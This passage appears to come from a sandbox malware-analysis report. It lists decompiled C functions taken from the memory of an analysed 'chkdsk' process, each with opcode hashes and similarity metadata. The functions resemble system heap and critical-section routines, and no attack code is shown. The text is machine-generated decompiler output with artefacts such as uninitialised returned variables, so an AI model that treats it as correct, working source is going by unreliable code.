                                                      				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4d611a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                      					return E04E588F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                      				} else {
                                                      					return E04DA0050(_t14);
                                                      				}
                                                      			}











                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a11e05cc92dcde5df1fbf9483a1546f6278fa468887870734999f2bfbea4868d
                                                      • Instruction ID: f8555d34272202649c2246a3f7217d5df373ad2d5a4e2891d389955b36173110
                                                      • Opcode Fuzzy Hash: a11e05cc92dcde5df1fbf9483a1546f6278fa468887870734999f2bfbea4868d
                                                      • Instruction Fuzzy Hash: 76E09AB02052049FEB35DF51D080F2937E8AB42625F19801EE408CB201C621FCC8C61A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E04E141E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t5;
                                                      				void* _t14;
                                                      
                                                      				_push(8);
                                                      				_push(0x4e608f0);
                                                      				_t5 = E04DDD08C(__ebx, __edi, __esi);
                                                      				if( *0x4e787ec == 0) {
                                                      					E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                      					if( *0x4e787ec == 0) {
                                                      						 *0x4e787f0 = 0x4e787ec;
                                                      						 *0x4e787ec = 0x4e787ec;
                                                      						 *0x4e787e8 = 0x4e787e4;
                                                      						 *0x4e787e4 = 0x4e787e4;
                                                      					}
                                                      					 *(_t14 - 4) = 0xfffffffe;
                                                      					_t5 = L04E14248();
                                                      				}
                                                      				return E04DDD0D1(_t5);
                                                      			}






                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d4b1d2a9db98eecf54a213c704d442086364295b4c35d6ae53bde38a8766c5a
                                                      • Instruction ID: 49745eac6a163366bf04aabd4952ac74b40db859fc08660f05d3bbf918387a51
                                                      • Opcode Fuzzy Hash: 4d4b1d2a9db98eecf54a213c704d442086364295b4c35d6ae53bde38a8766c5a
                                                      • Instruction Fuzzy Hash: 0AF01574A90706CFEBA0FFABE50971437A4FBA433AF10621AD006C7298C7786881CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04E3D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                      				void* _t5;
                                                      
                                                      				if(_a4 != 0) {
                                                      					_t5 = L04D8E8B0(__ecx, _a4, 0xfff);
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                      					return _t5;
                                                      				}
                                                      				return 0xc000000d;
                                                      			}





                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction ID: c2200718d608a05cb693b938c3e07ea700590c48248678136da57a993a9ebc0e
                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction Fuzzy Hash: 49E0C231381208BBEB226E44CC00FB97B26DB807A5F104031FE08AA690C675FCA1EAD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DBA185() {
                                                      				void* __ecx;
                                                      				intOrPtr* _t5;
                                                      
                                                      				if( *0x4e767e4 >= 0xa) {
                                                      					if(_t5 < 0x4e76800 || _t5 >= 0x4e76900) {
                                                      						return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                      					} else {
                                                      						goto L1;
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					return E04DA0010(0x4e767e0, _t5);
                                                      				}
                                                      			}






                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c332bbec8aec11d3a417c5888613e3f9f0b60a263232b45c99d124a737a571
                                                      • Instruction ID: a4084b6dccd1940be5e428808280f5f4a06661d23f3425e433452ddaf1cbfff8
                                                      • Opcode Fuzzy Hash: d7c332bbec8aec11d3a417c5888613e3f9f0b60a263232b45c99d124a737a571
                                                      • Instruction Fuzzy Hash: A6D02B31261400A7FA1D9B30B855B2123D6EB807BCF300C0DF1430A794D954FCE4C198
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DB16E0(void* __edx, void* __eflags) {
                                                      				void* __ecx;
                                                      				void* _t3;
                                                      
                                                      				_t3 = E04DB1710(0x4e767e0);
                                                      				if(_t3 == 0) {
                                                      					_t6 =  *[fs:0x30];
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						return L04DA4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					return _t3;
                                                      				}
                                                      			}






                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04E053CA(void* __ebx) {
                                                      				intOrPtr _t7;
                                                      				void* _t13;
                                                      				void* _t14;
                                                      				intOrPtr _t15;
                                                      				void* _t16;
                                                      
                                                      				_t13 = __ebx;
                                                      				if( *((char*)(_t16 - 0x65)) != 0) {
                                                      					E04D9EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                      					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                      				}
                                                      				if(_t15 != 0) {
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                      					return  *((intOrPtr*)(_t16 - 0x64));
                                                      				}
                                                      				return _t7;
                                                      			}








                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DB35A1(void* __eax, void* __ebx, void* __ecx) {
                                                      				void* _t6;
                                                      				void* _t10;
                                                      				void* _t11;
                                                      
                                                      				_t10 = __ecx;
                                                      				_t6 = __eax;
                                                      				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                      					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                      				}
                                                      				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                      					return E04D9EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      				}
                                                      				return _t6;
                                                      			}






                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D9AAB0() {
                                                      				intOrPtr* _t4;
                                                      
                                                      				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                      				if(_t4 != 0) {
                                                      					if( *_t4 == 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                      					}
                                                      				} else {
                                                      					L1:
                                                      					return 0x7ffe0030;
                                                      				}
                                                      			}




                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04E0A537(intOrPtr _a4, intOrPtr _a8) {
                                                      
                                                      				return L04DA8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                      			}



                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D8DB40() {
                                                      				signed int* _t3;
                                                      				void* _t5;
                                                      
                                                      				_t3 = L04DA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                      				if(_t3 == 0) {
                                                      					return 0;
                                                      				} else {
                                                      					 *_t3 =  *_t3 | 0x00000400;
                                                      					return _t3;
                                                      				}
                                                      			}





                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D8AD30(intOrPtr _a4) {
                                                      
                                                      				return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                      			}



                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DB36CC(void* __ecx) {
                                                      
                                                      				if(__ecx > 0x7fffffff) {
                                                      					return 0;
                                                      				} else {
                                                      					return L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                      				}
                                                      			}



                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D976E2(void* __ecx) {
                                                      				void* _t5;
                                                      
                                                      				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                      					return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                      				}
                                                      				return _t5;
                                                      			}




                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DA3A1C(intOrPtr _a4) {
                                                      				void* _t5;
                                                      
                                                      				return L04DA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                      			}




                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DA7D50() {
                                                      				intOrPtr* _t3;
                                                      
                                                      				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                      				if(_t3 != 0) {
                                                      					return  *_t3;
                                                      				} else {
                                                      					return _t3;
                                                      				}
                                                      			}




                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04DB2ACB() {
                                                      				void* _t5;
                                                      
                                                      				return E04D9EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      			}




                                                      0x04db2adc

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 9b420140838486d7d1929678cc22fb0e525c03fafc9550b1ef7e2feb65db1436
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: 9EB01232D10450CFCF02EF40C610B197371FB00754F054490900167D70C329BC01CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E04E1FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                      				void* _t7;
                                                      				intOrPtr _t9;
                                                      				intOrPtr _t10;
                                                      				intOrPtr* _t12;
                                                      				intOrPtr* _t13;
                                                      				intOrPtr _t14;
                                                      				intOrPtr* _t15;
                                                      
                                                      				_t13 = __edx;
                                                      				_push(_a4);
                                                      				_t14 =  *[fs:0x18];
                                                      				_t15 = _t12;
                                                      				_t7 = E04DCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                      				_push(_t13);
                                                      				E04E15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                      				_t9 =  *_t15;
                                                      				if(_t9 == 0xffffffff) {
                                                      					_t10 = 0;
                                                      				} else {
                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                      				}
                                                      				_push(_t10);
                                                      				_push(_t15);
                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                      				return E04E15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                      			}











                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E1FDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04E1FE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04E1FE01
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 369cc988a33b9915c5aaf5a617db4d24226e7d88c19ab345ea838b5e39a4e854
                                                      • Instruction ID: 3ed215468c9a636cf79484edc55a49ba1ff77820f4de33cf8c9aa6e7f58a23dd
                                                      • Opcode Fuzzy Hash: 369cc988a33b9915c5aaf5a617db4d24226e7d88c19ab345ea838b5e39a4e854
                                                      • Instruction Fuzzy Hash: F1F0F632240241BFE6211A45DC02F23BF6BEB84730F140315F628561E1EAA2F86097F4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%